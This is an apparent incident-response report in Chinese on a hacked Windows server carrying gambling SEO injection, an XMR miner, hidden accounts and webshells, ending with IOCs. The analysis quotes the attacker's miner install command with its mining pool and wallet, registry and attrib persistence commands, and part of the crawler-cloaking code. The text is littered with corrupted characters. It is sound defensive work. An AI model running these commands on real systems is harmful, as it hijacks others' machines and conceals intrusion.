前言本文是前段時(shí)間處理某用戶被黑的分析總結(jié)����,用戶被黑的表現(xiàn)是使用爬蟲訪問(wèn)用戶網(wǎng)站的首頁(yè)時(shí)會(huì)出現(xiàn)博彩關(guān)鍵字,而使用正常瀏覽器訪問(wèn)時(shí)無(wú)相關(guān)的博彩關(guān)鍵詞����。這是典型的黑帽SEO的表現(xiàn),針對(duì)這種技術(shù)�����,前期文章已有相關(guān)分析���,感興趣的同學(xué)可以看一看��。 此次分析��,發(fā)現(xiàn)用戶的服務(wù)器被多波不同利益的黑客入侵���,里面有一些比較有意思的內(nèi)容��,所以特意分析總結(jié)了一下�。 一�����、概述1��、分析結(jié)果經(jīng)過(guò)分析���,目前得到以下結(jié)論: 1)服務(wù)器上存在博彩信息與挖礦程序���,說(shuō)明被多波不同利益團(tuán)隊(duì)的黑客入侵;
2)此服務(wù)器于2018年9月21日被黑客入侵后加上相應(yīng)的博彩內(nèi)容���,相應(yīng)的IP為175.41.27.93�;
3)此服務(wù)器在2016年2月份甚至更早就已經(jīng)被黑客植入網(wǎng)馬了;
4)服務(wù)器在2017年12月19日被植入挖礦程序��;
5)系統(tǒng)被增加了隱藏賬號(hào)test$����,并且在2018年9月21日14:38發(fā)現(xiàn)賬號(hào)guest有IP為212.66.52.88�,地理位置為烏克蘭登錄的情況。
二�、分析過(guò)程2.1 入侵現(xiàn)象2018年9月份,通過(guò)我司監(jiān)測(cè)平臺(tái)監(jiān)測(cè)到某網(wǎng)站被植入博彩內(nèi)容����,具體如下: 
網(wǎng)站被植入博彩信息 網(wǎng)站被植入博彩基本上說(shuō)明網(wǎng)站被黑客入侵,我司“捕影”應(yīng)急響應(yīng)小組立即協(xié)助用戶進(jìn)行入侵分析����。 2.2 系統(tǒng)分析系統(tǒng)分析主要用于分析其系統(tǒng)賬號(hào)、進(jìn)程�����、開放端口���、連接�、啟動(dòng)項(xiàng)、文件完整性��、關(guān)鍵配置文件等����,通過(guò)系統(tǒng)相關(guān)項(xiàng)的分析判斷其系統(tǒng)層面是否正常。對(duì)其系統(tǒng)層面分析��,發(fā)現(xiàn)以下層面存在問(wèn)題: 系統(tǒng)賬號(hào) 對(duì)系統(tǒng)賬號(hào)的分析�����,目前發(fā)現(xiàn)系統(tǒng)存在以下賬號(hào): Administraotr��、MYSQL_ZKEYS����、test$ 、zhimei�����、renjian�����、APP_IWAM_61264026、APP_IWAM_6127201����、guest
其中test$明顯為隱藏賬號(hào),一般情況下系統(tǒng)管理員不會(huì)增加隱藏賬號(hào)���,該賬號(hào)肯定為黑客增加。另外幾個(gè)賬號(hào)�,如zhimei、renjian等為可疑賬號(hào)�����,需要管理人員進(jìn)行確認(rèn)����。 
系統(tǒng)賬號(hào)情況 
管理員信息 管理員組中存在administrator和guest,一般情況下guest為來(lái)賓賬號(hào)���,不會(huì)增加到管理員組中�,懷疑該賬號(hào)為黑客增加到管理員組中����。 系統(tǒng)賬號(hào)存在兩個(gè)問(wèn)題: 1)服務(wù)器被增加test$隱藏賬號(hào)
2)Guest賬號(hào)被加入到管理員組中
日志分析 通過(guò)相關(guān)安全產(chǎn)品的日志�,可以看到guest賬號(hào)于2018年9月21日14:38被IP為212.66.52.88的烏克蘭IP登錄���,該賬號(hào)密碼肯定已泄露�����,建議禁用該賬號(hào)�����。 
進(jìn)程與服務(wù)分析 對(duì)其服務(wù)器分析�����,發(fā)現(xiàn)其服務(wù)器的CPU利用率非常高����,利用率為100%����。發(fā)現(xiàn)主要被SQLServer.exe占用。 
CPU利用率為100% 
SQLServer.exe占用CPU最高 找到該程序所在的目錄�����,發(fā)現(xiàn)該程序放在C:\ProgramData\MySQL目錄下,并且被目錄被隱藏��。里面有四個(gè)文件�����,兩個(gè)bat文件��,兩個(gè)exe文件��。 
【Startservice.bat功能分析】 對(duì)startservice.bat進(jìn)行分析��,其內(nèi)容如下: 
其功能如下: 1)set SERVICE_NAME=SystemHost�,指定其服務(wù)名為SystemHost: 
2)Tomcat9 install'%SERVICE_NAME%' SQLServer.exe -o stratum+tcp://pool.minexmr.com:7777–u 49ZRiTZK93yBqAJWBTh2zTAjvq8z9oTn38Rc2ScqSF7E8oRizddzy2iTh6kyyRibt 7Ai1w8RWhTAPPPti4ZABeMpHhCJa1F -p x -dbg -1-t 0
使用Tomcat9 安裝相應(yīng)的挖礦程序�,挖礦參數(shù)分析: 
礦池網(wǎng)站
黑客挖XMR數(shù)量
挖礦程序被植入時(shí)間 3)Set ProcessName=SQLServer.exe指定進(jìn)程名為SQLServer.exe:
4)attrib +h +r %cd%\*.* 作用:將該目錄下的所有文件隱藏 5) reg add 'HKLM\system\CurrentControlSet\Control\Terminal Server \WinStations\RDP-Tcp' /v 'MaxConnectionTime'/t REG_DWORD /d 0x1 /f
reg add'HKLM\system\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp' /v 'MaxDisconnectionTime' /tREG_DWORD /d 0x0 /f
reg add'HKLM\system\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp' /v 'MaxIdleTime' /t REG_DWORD /d 0x0/f
功能:配置注冊(cè)表,作用為使遠(yuǎn)程連接永不超時(shí)���。 6) net accounts /forcelogoff:no 功能: 防止強(qiáng)制注銷用戶 【mHi.bat功能分析】 mHi.bat的功能如下: 1)將c:\ProgramData及C:\ProgramData\MySQL隱藏�,防止安全人員發(fā)現(xiàn)���; 2)指定C:\ProgramData\MySQL�����、C:\WINDOWS\Tasks\AdobeFlash Player Updater.job����、C:\WINDOWS\Tasks\GoogleUpdateTaskMashine.job相關(guān)文件的訪問(wèn)控制權(quán)限,僅允許SYSTEM組用戶完全控制:
mHi.bat功能
calcls功能 【SQLServer.exe功能分析】 子進(jìn)程�����,主要功能用來(lái)挖礦 【Tomcat9.exe功能分析】 1)SQLServer.exe的父進(jìn)程�����,用來(lái)守護(hù)SQLServer.exe, 2)SQLServer.exe一旦被關(guān)閉�,會(huì)立即啟動(dòng)SQLServer.exe 【功能總結(jié)】 通過(guò)以上分析,可以看出�,黑客增加的四個(gè)文件的主要作用如下:
【應(yīng)急處置】 直接關(guān)閉SQLServer.exe,該程序立馬啟動(dòng)。由于其存在父進(jìn)程�,直接查找父進(jìn)程,命令如下:wmic process whereName='SQLServer.exe' get ParentProcessID: 首先關(guān)閉父進(jìn)程Tomcat9.exe����,然后再關(guān)閉子進(jìn)程SQLServer.exe,挖礦程序被清除�,CPU使用正常。
開放端口 對(duì)其該服務(wù)器進(jìn)行分析,發(fā)現(xiàn)該服務(wù)器開放以下端口:
端口開放情況
端口開放情況 建議關(guān)閉 21 �、 135 、 445 �����、 8080 等端口��,其他端口需要根據(jù)業(yè)務(wù)需求來(lái)決定是否關(guān)閉�����。 其他分析 對(duì)該服務(wù)器的連接�、安裝軟件、關(guān)鍵配置文件����、啟動(dòng)項(xiàng)分析���,目前未發(fā)現(xiàn)異常���。 分析結(jié)論 通過(guò)對(duì)系統(tǒng)層面分析,其服務(wù)器系統(tǒng)層面主要存在以下問(wèn)題: 1)服務(wù)器被增加test$隱藏賬號(hào) 2)Guest賬號(hào)被加入到管理員組中 3)guest賬號(hào)于2018年9月21日14:38被IP為212.66.52.88的烏克蘭IP登錄�,該賬號(hào)密碼已泄露,目前已禁用該賬號(hào) 4)端口開放過(guò)多,其中21�����、135�����、445��、8080等端口建議關(guān)閉 5)2017年12月19日已被植入挖礦程序 2.3 應(yīng)用分析博彩頁(yè)面分析 【技術(shù)原理】 通過(guò)內(nèi)容分析�,發(fā)現(xiàn)此次黑客為SEO性質(zhì)的。其主要目的在于通過(guò)黑帽SEO獲取經(jīng)濟(jì)利益����,一般情況下,黑客植入博彩內(nèi)容有以下途徑: 前端劫持 前端劫持一般都是在網(wǎng)站的相應(yīng)頁(yè)面中插入JS腳本�,通過(guò)JS來(lái)進(jìn)行跳轉(zhuǎn)劫持。也有發(fā)現(xiàn)黑客直接修改相應(yīng)的頁(yè)面內(nèi)容的���。
服務(wù)器端劫持 服務(wù)器端劫持也稱為后端劫持��,其是通過(guò)修改網(wǎng)站動(dòng)態(tài)語(yǔ)言文件,如global.asax��、global.asa�、conn.asp、conn.php這種文件�。這些文件是動(dòng)態(tài)腳本每次加載時(shí)都會(huì)加載的配置文件,如訪問(wèn)x.php時(shí)會(huì)加載conn.php�。這樣的話,只需要修改這些全局的動(dòng)態(tài)腳本文件(如global.asax)��,訪問(wèn)所有的aspx文件時(shí)都會(huì)加載這個(gè)global.asax文件�����,可以達(dá)到全局劫持的效果��。
針對(duì)以上兩種劫持技術(shù)�����,可以直接查看我前期的技術(shù)分析:http://www./articles/web/153788.html 【博彩分析】 通過(guò)頁(yè)面分析判斷為在服務(wù)器端劫持�,服務(wù)器端劫持一般是修改全局配置文件,如global.asax�、global.asa、conn.asp��、conn.php��。 通過(guò)對(duì)該服務(wù)器分析�,發(fā)現(xiàn)其修改config_global.php該文件。植入如下內(nèi)容:
這里面黑客將相應(yīng)的劫持內(nèi)容進(jìn)行base64加密了�,將其中base64加密的內(nèi)容進(jìn)行base64解密,得到以下內(nèi)容:
其中 function isSpider()函數(shù)主要用來(lái)判斷是否為爬蟲訪問(wèn)��,爬蟲的瀏覽器特征如下: $bots= array( ‘baidu’ => ‘baiduspider’, ‘sogou’ => ‘sogou’, ‘360spider’ => ‘haosouspider’, ‘360spider’ => ‘360spider’, ‘bingbot’ => ‘bingbot’, ‘Yisou’ => ‘Yisouspider’, 如果是爬蟲則返回http://l5./相關(guān)的內(nèi)容��。 【應(yīng)急處置】 處置的話比較簡(jiǎn)單��,直接將黑客增加的base64加密的內(nèi)容刪除即可���,刪除相關(guān)內(nèi)容以后�,訪問(wèn)正常���。 Webshell分析 Webshell主要是網(wǎng)馬�,其作用為通過(guò)webshell可以控制整個(gè)服務(wù)器�,并進(jìn)行系統(tǒng)級(jí)別的操作,使用D盾對(duì)服務(wù)器查殺����,發(fā)現(xiàn)存在23個(gè)webshell。
webshell Webshell主要是網(wǎng)馬���,其作用為通過(guò)webshell可以控制整個(gè)服務(wù)器��,并進(jìn)行系統(tǒng)級(jí)別的操作�,使用D盾對(duì)服務(wù)器查殺,發(fā)現(xiàn)存在23個(gè)webshell����。
webshell 選擇部分其代碼如下:
201806r4kfjtv4zexnvfbf.jpg圖片馬 針對(duì)網(wǎng)站發(fā)現(xiàn)的23個(gè)webshell,目前相關(guān)webshell均已刪除�。 2.4 日志分析未找到有效日志,無(wú)法分析入侵原因及途徑�����。 三�、IOC3.1 IP212.66.52.88
175.41.27.93
3.2 URLhttp://l5.
3.3 樣本MD570D9E2761B18CB0E4C4051E905F9E7A5
EA9F0B1E88B5E21B9A9D31D5C46E81D7
A3CD992FDDC2300AD8A23AD16FE3725C
A8ADE1F8D0D87E4D7A75919EE6B3740F
58A9B144762916FE227AF329F5D384F1
DBBB0ACE277D955833696F06C610DE2E
7F7D78755E070860EFFFD1272F14C7A7
9A5772ED22973DA02A45872BBC3735F2
E276D34B3AE124E8218CBC32B4D341B2
B663F32281526B17A540655EC05EC9EC
0D66C67B8BEC9627B696DEB275862E72
634630797CACCC334EFF054FE6279E91
AB908A995367FF0055DFF903F515B061
5D52847EC2CCC750951EF0765AEEC17B
249D7774648FB1CD309AA23B3F96430B
C13D2297D244D398B6A311DDA87DBDC7
C23206B81B06D64933C5FBC24AF69CF6
E14E6B1629ED5079F55B69DF66EDAFD7
8D01D604794D3494CBB31570B1E54182
2A235990DD38A0BCBAF2C4835EB8C0A3
5D568BC15EE4D861583E68B63762C2B1
0D66C67B8BEC9627B696DEB275862E72
3.4 礦池地址stratum+tcp://pool.minexmr.com:7777
3.5 錢包地址49ZRiTZK93yBqAJWBTh2zTAjvq8z9oTn38Rc2ScqSF7E8oRizddzy2iTh6kyyRibt7Ai1w8RWhTAPPPti4ZABeMpHhCJa1F
本文作者:feiniao,本文轉(zhuǎn)自FreeBuf.COM
“寒冬”已至��,名企老專家告訴你運(yùn)維該如何轉(zhuǎn)型 各大名企專家 GOPS 深圳站親自傳授大廠經(jīng)驗(yàn) 精彩日程一覽 ▼
GOPS 2019 · 深圳站亮點(diǎn)視頻
|
